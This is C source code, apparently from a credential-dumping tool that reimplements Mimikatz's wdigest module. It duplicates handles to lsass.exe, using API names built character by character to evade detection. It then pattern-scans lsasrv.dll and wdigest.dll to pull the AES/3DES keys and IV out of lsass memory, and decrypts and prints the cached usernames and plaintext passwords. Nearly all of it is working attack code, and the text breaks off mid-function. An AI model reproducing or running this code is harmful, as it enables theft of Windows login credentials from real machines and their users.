typedef HANDLE(NTAPI* _NtOpenProcess)(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
);
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* _NtDuplicateObject)(
HANDLE SourceProcessHandle,
HANDLE SourceHandle,
HANDLE TargetProcessHandle,
PHANDLE TargetHandle,
ACCESS_MASK DesiredAccess,
ULONG Attributes,
ULONG Options
);
typedef NTSTATUS(NTAPI* _NtQueryObject)(
HANDLE ObjectHandle,
ULONG ObjectInformationClass,
PVOID ObjectInformation,
ULONG ObjectInformationLength,
PULONG ReturnLength
);
typedef BOOL(NTAPI* _NtQueryFullProcessImageNameW)(
HANDLE hProcess,
DWORD dwFlags,
LPWSTR lpExeName,
PDWORD lpdwSize
);
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _SYSTEM_HANDLE {
ULONG ProcessId;
BYTE ObjectTypeNumber;
BYTE Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG HandleCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef enum _POOL_TYPE {
NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed,
DontUseThisType,
NonPagedPoolCacheAligned,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;
typedef struct _OBJECT_TYPE_INFORMATION {
UNICODE_STRING Name;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG TotalPagedPoolUsage;
ULONG TotalNonPagedPoolUsage;
ULONG TotalNamePoolUsage;
ULONG TotalHandleTableUsage;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
ULONG HighWaterPagedPoolUsage;
ULONG HighWaterNonPagedPoolUsage;
ULONG HighWaterNamePoolUsage;
ULONG HighWaterHandleTableUsage;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccess;
BOOLEAN SecurityRequired;
BOOLEAN MaintainHandleCount;
USHORT MaintainTypeList;
POOL_TYPE PoolType;
ULONG PagedPoolUsage;
ULONG NonPagedPoolUsage;
} OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION;
PVOID GetLibraryProcAddress(PSTR LibraryName, PSTR ProcName) {
return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
}
void ErrorExit(LPTSTR lpszFunction) {
// Retrieve the system error message for the last-error code
LPVOID lpMsgBuf;
LPVOID lpDisplayBuf;
DWORD dw = GetLastError();
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
dw,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR)&lpMsgBuf,
0, NULL);
printf((LPTSTR)lpMsgBuf);
LocalFree(lpMsgBuf);
LocalFree(lpDisplayBuf);
ExitProcess(dw);
}
void ShowErr() {
CHAR errormsg[100];
FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 0, errormsg, sizeof(errormsg), NULL);
printf("ERROR: %s", errormsg);
}
HANDLE enum_lsass_handles() {
char ntdll[] = { 'n','t','d','l','l','.','d','l','l',0};
char kernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l',0};
char qsysinfo[] = { 'N','t','Q','u','e','r','y','S','y','s','t','e','m','I','n','f','o','r','m','a','t','i','o','n',0};
char dupo[] = { 'N','t','D','u','p','l','i','c','a','t','e','O','b','j','e','c','t',0};
char qo[] = { 'N','t','Q','u','e','r','y','O','b','j','e','c','t',0};
char qfpi[] = { 'Q','u','e','r','y','F','u','l','l','P','r','o','c','e','s','s','I','m','a','g','e','N','a','m','e','W',0};
char op[] = { 'O','p','e','n','P','r','o','c','e','s','s',0};
_NtQuerySystemInformation ffNtQuery_SystemInformation = GetLibraryProcAddress(ntdll, qsysinfo);
_NtDuplicateObject ffNtDuplicate_Object = GetLibraryProcAddress(ntdll, dupo);
_NtQueryObject ffNtQuery_Object = GetLibraryProcAddress(ntdll, qo);
_NtQueryFullProcessImageNameW ffNtQuery_FullProcessImageNameW = GetLibraryProcAddress(kernel32, qfpi);
_NtOpenProcess ffNtOpen_Process = GetLibraryProcAddress(kernel32, op);
NTSTATUS status;
PSYSTEM_HANDLE_INFORMATION handleInfo;
ULONG handleInfoSize = 0x10000;
ULONG pid;
HANDLE processHandle;
ULONG i;
HANDLE lsass_handles = NULL;
handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
// NtQuerySystemInformation won't give us the correct buffer size,
// so we guess by doubling the buffer size.
while ((status = ffNtQuery_SystemInformation(
SystemHandleInformation,
handleInfo,
handleInfoSize,
NULL
)) == STATUS_INFO_LENGTH_MISMATCH)
handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
// NtQuerySystemInformation stopped giving us STATUS_INFO_LENGTH_MISMATCH.
if (!NT_SUCCESS(status)) {
printf("NtQuerySystemInformation failed!\n");
return 1;
}
for (i = 0; i < handleInfo->HandleCount; i++) {
SYSTEM_HANDLE handle = handleInfo->Handles[i];
HANDLE dupHandle = NULL;
POBJECT_TYPE_INFORMATION objectTypeInfo;
PVOID objectNameInfo;
UNICODE_STRING objectName;
ULONG returnLength;
// Check if PID belongs to System
if (handle.ProcessId == 4)
continue;
processHandle = ffNtOpen_Process(PROCESS_DUP_HANDLE, FALSE, handle.ProcessId);
// Duplicate the handle so we can query it.
if (!NT_SUCCESS(ffNtDuplicate_Object(
processHandle,
(void*)handle.Handle,
GetCurrentProcess(),
&dupHandle,
PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
0,
0
))) {
continue;
}
// Query the object type.
objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
if (!NT_SUCCESS(ffNtQuery_Object(
dupHandle,
ObjectTypeInformation,
objectTypeInfo,
0x1000,
NULL
))) {
continue;
}
UNICODE_STRING objectType = *(PUNICODE_STRING)objectTypeInfo;
wchar_t path[MAX_PATH];
DWORD maxPath = MAX_PATH;
if (wcsstr(objectType.Buffer,L"Process") != NULL)
{
// Print handle, type and its PID
ffNtQuery_FullProcessImageNameW(dupHandle, 0, path, &maxPath);
if (wcsstr(path, L"lsass.exe") != NULL) {
printf("[%#x] %S: %d %ws\n", handle.Handle, objectType.Buffer, handle.ProcessId, path);
lsass_handles = dupHandle;
}
}
free(objectTypeInfo);
}
free(handleInfo);
return lsass_handles;
}
<|start_filename|>Example/sekurlsa_wdigest.c<|end_filename|>
#define WIN32_NO_STATUS
#define SECURITY_WIN32
#include <windows.h>
#include <psapi.h>
#include <ntsecapi.h>
#include <sspi.h>
#include <sddl.h>
#include <wincred.h>
#include <ntsecapi.h>
#include <ntsecpkg.h>
#include <stdio.h>
#include <bcrypt.h>
#include <ntstatus.h>
#include <tlhelp32.h>
#pragma comment(lib,"Bcrypt.lib")
#pragma comment(lib,"psapi.lib")
#pragma comment(lib, "advapi32.lib")
//** Offsets and Structs credited to Mimikatz **/
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
struct _KIWI_WDIGEST_LIST_ENTRY* Flink;
struct _KIWI_WDIGEST_LIST_ENTRY* Blink;
ULONG UsageCount;
struct _KIWI_WDIGEST_LIST_ENTRY* This;
LUID LocallyUniqueIdentifier;
UNICODE_STRING UserName; // 0x30
UNICODE_STRING Domaine; // 0x40
UNICODE_STRING Password; // 0x50
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
typedef struct _KIWI_HARD_KEY {
ULONG cbSecret;
BYTE data[60]; // etc...
} KIWI_HARD_KEY, *PKIWI_HARD_KEY;
typedef struct _KIWI_BCRYPT_KEY {
ULONG size;
ULONG tag; // 'MSSK'
ULONG type;
ULONG unk0;
ULONG unk1;
ULONG bits;
KIWI_HARD_KEY hardkey;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
typedef struct _KIWI_BCRYPT_KEY81 {
ULONG size;
ULONG tag; // 'MSSK'
ULONG type;
ULONG unk0;
ULONG unk1;
ULONG unk2;
ULONG unk3;
ULONG unk4;
PVOID unk5; // before, align in x64
ULONG unk6;
ULONG unk7;
ULONG unk8;
ULONG unk9;
KIWI_HARD_KEY hardkey;
} KIWI_BCRYPT_KEY81, *PKIWI_BCRYPT_KEY81;
typedef struct _KIWI_BCRYPT_HANDLE_KEY {
ULONG size;
ULONG tag; // 'UUUR'
PVOID hAlgorithm;
PKIWI_BCRYPT_KEY81 key;
PVOID unk0;
} KIWI_BCRYPT_HANDLE_KEY, *PKIWI_BCRYPT_HANDLE_KEY;
// Signature used to find l_LogSessList (PTRN_WIN6_PasswdSet from Mimikatz)
unsigned char logSessListSig[] = { 0x48, 0x3b, 0xd9, 0x74 };
#define USERNAME_OFFSET 0x30
#define HOSTNAME_OFFSET 0x40
#define PASSWORD_OFFSET 0x50
//* End structs and offsets *//
// Holds extracted InitializationVector
unsigned char gInitializationVector[16];
// Holds extracted 3DES key
unsigned char gDesKey[24];
// Holds extracted AES key
unsigned char gAesKey[16];
// Decrypt wdigest cached credentials using AES or 3Des
ULONG DecryptCredentials(char* encrypedPass, DWORD encryptedPassLen, unsigned char* decryptedPass, ULONG decryptedPassLen) {
BCRYPT_ALG_HANDLE hProvider, hDesProvider;
BCRYPT_KEY_HANDLE hAes, hDes;
ULONG result;
NTSTATUS status;
unsigned char initializationVector[16];
// Same IV used for each cred, so we need to work on a local copy as this is updated
// each time by BCryptDecrypt
memcpy(initializationVector, gInitializationVector, sizeof(gInitializationVector));
if (encryptedPassLen % 8) {
// If suited to AES, lsasrv uses AES in CFB mode
printf("[-->] AES\n");
BCryptOpenAlgorithmProvider(&hProvider, BCRYPT_AES_ALGORITHM, NULL, 0);
BCryptSetProperty(hProvider, BCRYPT_CHAINING_MODE, (PBYTE)BCRYPT_CHAIN_MODE_CFB, sizeof(BCRYPT_CHAIN_MODE_CFB), 0);
BCryptGenerateSymmetricKey(hProvider, &hAes, NULL, 0, gAesKey, sizeof(gAesKey), 0);
status = BCryptDecrypt(hAes, (PUCHAR)encrypedPass, encryptedPassLen, 0, initializationVector, sizeof(gInitializationVector), decryptedPass, decryptedPassLen, &result, 0);
if (status != 0) {
return 0;
}
return result;
}
else {
// If suited to 3DES, lsasrv uses 3DES in CBC mode
printf("[-->] 3DES\n");
BCryptOpenAlgorithmProvider(&hDesProvider, BCRYPT_3DES_ALGORITHM, NULL, 0);
BCryptSetProperty(hDesProvider, BCRYPT_CHAINING_MODE, (PBYTE)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
BCryptGenerateSymmetricKey(hDesProvider, &hDes, NULL, 0, gDesKey, sizeof(gDesKey), 0);
status = BCryptDecrypt(hDes, (PUCHAR)encrypedPass, encryptedPassLen, 0, initializationVector, 8, decryptedPass, decryptedPassLen, &result, 0);
if (status != 0) {
return 0;
}
return result;
}
}
// Read memory from LSASS process
SIZE_T ReadFromLsass(HANDLE hLsass, void* addr, void *memOut, int memOutLen) {
SIZE_T bytesRead = 0;
memset(memOut, 0, memOutLen);
ReadProcessMemory(hLsass, addr, memOut, memOutLen, &bytesRead);
return bytesRead;
}
// Searches for a provided pattern in memory and returns the offset
DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) {
ULONG offset = 0;
// Hunt for signature locally to avoid a load of RPM calls
for (int i = 0; i < 0x200000; i++) {
if (*(unsigned char*)(mem + i) == signature[0] && *(unsigned char*)(mem + i + 1) == signature[1]) {
if (memcmp(mem + i, signature, signatureLen) == 0) {
// Found the signature
offset = i;
break;
}
}
}
return offset;
}
// Recoveres AES, 3DES and IV from lsass memory required to decrypt wdigest credentials
int FindKeysOnWin7(HANDLE hLsass, char* lsasrvMem) {
BYTE PTRN_WNO8_LsaInitializeProtectedMemory_KEY[] = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x44, 0x8b, 0x4c, 0x24, 0x48, 0x48, 0x8b, 0x0d };
int IV_OFFSET = 59;
int DES_OFFSET = -61;
int AES_OFFSET = 25;
DWORD keySigOffset = 0;
DWORD ivOffset = 0;
DWORD desOffset = 0, aesOffset = 0;
KIWI_BCRYPT_HANDLE_KEY h3DesKey, hAesKey;
KIWI_BCRYPT_KEY extracted3DesKey, extractedAesKey;
void* keyPointer = NULL;
// Load lsasrv.dll locally to avoid multiple ReadProcessMemory calls into lsass
unsigned char *lsasrvLocal = (unsigned char*)LoadLibraryA("lsasrv.dll");
if (lsasrvLocal == (unsigned char*)0) {
printf("[x] Error: Could not load lsasrv.dll locally\n");
return 1;
}
printf("[*] Loaded lsasrv.dll locally at address %p\n", lsasrvLocal);
// Search for AES/3Des/IV signature within lsasrv.dll and grab the offset
keySigOffset = SearchPattern(lsasrvLocal, PTRN_WNO8_LsaInitializeProtectedMemory_KEY, sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY));
if (keySigOffset == 0) {
printf("[x] Error: Could not find offset to AES/3Des/IV keys\n");
return 1;
}
printf("[*] Found offset to AES/3Des/IV at %d\n", keySigOffset);
// Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET, (char*)&ivOffset, 4);
printf("[*] InitializationVector offset found as %d\n", ivOffset);
// Read InitializationVector (16 bytes)
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET + 4 + ivOffset, gInitializationVector, 16);
printf("[*] InitializationVector recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
for (int i = 0; i < 16; i++) {
printf("%02x ", gInitializationVector[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET, &desOffset, 4);
printf("[*] h3DesKey offset found as %d\n", desOffset);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET + 4 + desOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in the 3DES key
ReadFromLsass(hLsass, h3DesKey.key, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] 3Des Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gDesKey, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extracted3DesKey.hardkey.cbSecret; i++) {
printf("%02x ", gDesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET, &aesOffset, 4);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET + 4 + aesOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &hAesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in AES key
ReadFromLsass(hLsass, hAesKey.key, &extractedAesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] Aes Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gAesKey, extractedAesKey.hardkey.data, extractedAesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extractedAesKey.hardkey.cbSecret; i++) {
printf("%02x ", gAesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
return 0;
}
// Recoveres AES, 3DES and IV from lsass memory required to decrypt wdigest credentials
int FindKeysOnWin8(HANDLE hLsass, char* lsasrvMem) {
BYTE PTRN_WIN8_LsaInitializeProtectedMemory_KEY[] = { <KEY> };
int IV_OFFSET = 62;
int DES_OFFSET = -70;
int AES_OFFSET = 23;
DWORD keySigOffset = 0;
DWORD ivOffset = 0;
DWORD desOffset = 0, aesOffset = 0;
KIWI_BCRYPT_HANDLE_KEY h3DesKey, hAesKey;
KIWI_BCRYPT_KEY81 extracted3DesKey, extractedAesKey;
void* keyPointer = NULL;
// Load lsasrv.dll locally to avoid multiple ReadProcessMemory calls into lsass
unsigned char *lsasrvLocal = (unsigned char*)LoadLibraryA("lsasrv.dll");
if (lsasrvLocal == (unsigned char*)0) {
printf("[x] Error: Could not load lsasrv.dll locally\n");
return 1;
}
printf("[*] Loaded lsasrv.dll locally at address %p\n", lsasrvLocal);
// Search for AES/3Des/IV signature within lsasrv.dll and grab the offset
keySigOffset = SearchPattern(lsasrvLocal, PTRN_WIN8_LsaInitializeProtectedMemory_KEY, sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY));
if (keySigOffset == 0) {
printf("[x] Error: Could not find offset to AES/3Des/IV keys\n");
return 1;
}
printf("[*] Found offset to AES/3Des/IV at %d\n", keySigOffset);
// Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET, (char*)&ivOffset, 4);
printf("[*] InitializationVector offset found as %d\n", ivOffset);
// Read InitializationVector (16 bytes)
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET + 4 + ivOffset, gInitializationVector, 16);
printf("[*] InitializationVector recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
for (int i = 0; i < 16; i++) {
printf("%02x ", gInitializationVector[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET, &desOffset, 4);
printf("[*] h3DesKey offset found as %d\n", desOffset);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET + 4 + desOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in the 3DES key
ReadFromLsass(hLsass, h3DesKey.key, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] 3Des Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gDesKey, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extracted3DesKey.hardkey.cbSecret; i++) {
printf("%02x ", gDesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET, &aesOffset, 4);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET + 4 + aesOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &hAesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in AES key
ReadFromLsass(hLsass, hAesKey.key, &extractedAesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] Aes Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gAesKey, extractedAesKey.hardkey.data, extractedAesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extractedAesKey.hardkey.cbSecret; i++) {
printf("%02x ", gAesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
return 0;
}
// Recoveres AES, 3DES and IV from lsass memory required to decrypt wdigest credentials
// before Win10_1903
int FindKeysOnWin10(HANDLE hLsass, char* lsasrvMem) {
BYTE PTRN_WN10_LsaInitializeProtectedMemory_KEY[] = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x44, 0x8b, 0x4d, 0xd8, 0x48, 0x8d, 0x15 };
int IV_OFFSET = 61;
int DES_OFFSET = -73;
int AES_OFFSET = 16;
DWORD keySigOffset = 0;
DWORD ivOffset = 0;
DWORD desOffset = 0, aesOffset = 0;
KIWI_BCRYPT_HANDLE_KEY h3DesKey, hAesKey;
KIWI_BCRYPT_KEY81 extracted3DesKey, extractedAesKey;
void* keyPointer = NULL;
// Load lsasrv.dll locally to avoid multiple ReadProcessMemory calls into lsass
unsigned char *lsasrvLocal = (unsigned char*)LoadLibraryA("lsasrv.dll");
if (lsasrvLocal == (unsigned char*)0) {
printf("[x] Error: Could not load lsasrv.dll locally\n");
return 1;
}
printf("[*] Loaded lsasrv.dll locally at address %p\n", lsasrvLocal);
// Search for AES/3Des/IV signature within lsasrv.dll and grab the offset
keySigOffset = SearchPattern(lsasrvLocal, PTRN_WN10_LsaInitializeProtectedMemory_KEY, sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY));
if (keySigOffset == 0) {
printf("[x] Error: Could not find offset to AES/3Des/IV keys\n");
return 1;
}
printf("[*] Found offset to AES/3Des/IV at %d\n", keySigOffset);
// Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET, (char*)&ivOffset, 4);
printf("[*] InitializationVector offset found as %d\n", ivOffset);
// Read InitializationVector (16 bytes)
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + IV_OFFSET + 4 + ivOffset, gInitializationVector, 16);
printf("[*] InitializationVector recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
for (int i = 0; i < 16; i++) {
printf("%02x ", gInitializationVector[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET, &desOffset, 4);
printf("[*] h3DesKey offset found as %d\n", desOffset);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + DES_OFFSET + 4 + desOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in the 3DES key
ReadFromLsass(hLsass, h3DesKey.key, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] 3Des Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gDesKey, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extracted3DesKey.hardkey.cbSecret; i++) {
printf("%02x ", gDesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
// Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET, &aesOffset, 4);
// Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
ReadFromLsass(hLsass, lsasrvMem + keySigOffset + AES_OFFSET + 4 + aesOffset, &keyPointer, sizeof(char*));
// Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
ReadFromLsass(hLsass, keyPointer, &hAesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY));
// Read in AES key
ReadFromLsass(hLsass, hAesKey.key, &extractedAesKey, sizeof(KIWI_BCRYPT_KEY));
printf("[*] Aes Key recovered as:\n");
printf("[*] ====[ Start ]====\n[*] ");
memcpy(gAesKey, extractedAesKey.hardkey.data, extractedAesKey.hardkey.cbSecret);
for (unsigned int i = 0; i < extractedAesKey.hardkey.cbSecret; i++) {
printf("%02x ", gAesKey[i]);
}
printf("\n[*] ====[ End ]===\n");
return 0;
}
// Reads out a LSA_UNICODE_STRING from lsass address provided
UNICODE_STRING *ExtractUnicodeString(HANDLE hLsass, char* addr) {
UNICODE_STRING *str;
WORD* mem;
str = (UNICODE_STRING*)LocalAlloc(LPTR, sizeof(UNICODE_STRING));
// Read LSA_UNICODE_STRING from lsass memory
ReadFromLsass(hLsass, addr, str, sizeof(UNICODE_STRING));
mem = (WORD*)LocalAlloc(LPTR, str->MaximumLength);
if (mem == (WORD*)0) {
LocalFree(str);
return NULL;
}
// Read the buffer contents for the LSA_UNICODE_STRING from lsass memory
ReadFromLsass(hLsass, *(void**)((char*)str + 8), mem, str->MaximumLength);
str->Buffer = (PWSTR)mem;
return str;
}
// Free memory allocated within getUnicodeString
void FreeUnicodeString(UNICODE_STRING* unicode) {
LocalFree(unicode->Buffer);
LocalFree(unicode);
}
// Hunts through wdigest and extracts credentials to be decrypted
int FindCredentials(HANDLE hLsass, char* wdigestMem) {
KIWI_WDIGEST_LIST_ENTRY entry;
DWORD logSessListSigOffset, logSessListOffset;
unsigned char* logSessListAddr;
unsigned char* wdigestLocal;
unsigned char* llCurrent, *llStart;
unsigned char passDecrypted[1024];
// Load wdigest.dll locally to avoid multiple ReadProcessMemory calls into lsass
wdigestLocal = (unsigned char*)LoadLibraryA("wdigest.dll");
if (wdigestLocal == NULL) {
printf("[x] Error: Could not load wdigest.dll into local process\n");
return 1;
}
printf("[*] Loaded wdigest.dll at address %p\n", wdigestLocal);
// Search for l_LogSessList signature within wdigest.dll and grab the offset
logSessListSigOffset = SearchPattern(wdigestLocal, logSessListSig, sizeof(logSessListSig));
if (logSessListSigOffset == 0) {
printf("[x] Error: Could not find l_LogSessList signature\n");
return 1;
}
printf("[*] l_LogSessList offset found as %d\n", logSessListSigOffset);
// Read memory offset to l_LogSessList from a "lea reg, [l_LogSessList]" asm
ReadFromLsass(hLsass, wdigestMem + logSessListSigOffset - 4, &logSessListOffset, sizeof(DWORD));
// Read pointer at address to get the true memory location of l_LogSessList
ReadFromLsass(hLsass, wdigestMem + logSessListSigOffset + logSessListOffset, &logSessListAddr, sizeof(char*));
printf("[*] l_LogSessList found at address %p\n", logSessListAddr);
printf("[*] Credentials incoming... (hopefully)\n\n");
// Read first entry from linked list
ReadFromLsass(hLsass, logSessListAddr, &entry, sizeof(KIWI_WDIGEST_LIST_ENTRY));
llCurrent = (unsigned char*)entry.This;
do {
memset(&entry, 0, sizeof(entry));
// Read entry from linked list
ReadFromLsass(hLsass, llCurrent, &entry, sizeof(KIWI_WDIGEST_LIST_ENTRY));
if (entry.UsageCount == 1) {
UNICODE_STRING* username = ExtractUnicodeString(hLsass, (char*)llCurrent + USERNAME_OFFSET);
UNICODE_STRING * hostname = ExtractUnicodeString(hLsass, (char*)llCurrent + HOSTNAME_OFFSET);
UNICODE_STRING * password = ExtractUnicodeString(hLsass, (char*)llCurrent + PASSWORD_OFFSET);
if (username != NULL && username->Length != 0) {
printf("\n[-->] Username: %ls\n", username->Buffer);
}
else {
printf("\n[-->] Username: [NULL]\n");
}
if (hostname != NULL && hostname->Length != 0) {
printf("[-->] Hostname: %ls\n", hostname->Buffer);
}
else {
printf("[-->] Hostname: [NULL]\n");
}
// Check if password is present
if (password->Length != 0 && (password->Length % 2) == 0) {
// Decrypt password using recovered AES/3Des keys and IV
if (DecryptCredentials((char*)password->Buffer, password->MaximumLength, passDecrypted, sizeof(passDecrypted)) > 0) {
printf("[-->] Password: %ls\n\n", passDecrypted);
}
}
else {
printf("[-->] Password: [<PASSWORD>]\n\n");
}
FreeUnicodeString(username);
FreeUnicodeString(hostname);
FreeUnicodeString(password);
}
llCurrent = (unsigned char*)entry.Flink;
} while (llCurrent != logSessListAddr);
return 0;
}
// Searches for lsass.exe PID
int GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(hSnapshot, &entry)) {
while (Process32Next(hSnapshot, &entry)) {
if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {
return entry.th32ProcessID;
}
}
}
CloseHandle(hSnapshot);
return 0;
}
BOOL EnableDebugPrivilege(BOOL fEnable)
{
BOOL fOk = FALSE;
HANDLE hToken;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
fOk = (GetLastError() == ERROR_SUCCESS);
CloseHandle(hToken);
}
return(fOk);
}
int GetOSVersion()
{
typedef void(__stdcall*NTPROC)(DWORD*, DWORD*, DWORD*);
HINSTANCE hinst = LoadLibrary(L"ntdll.dll");
DWORD dwMajor, dwMinor, dwBuildNumber;
NTPROC proc = (NTPROC)GetProcAddress(hinst, "RtlGetNtVersionNumbers");
proc(&dwMajor, &dwMinor, &dwBuildNumber);
if (dwMajor == 10 && dwMinor == 0) {
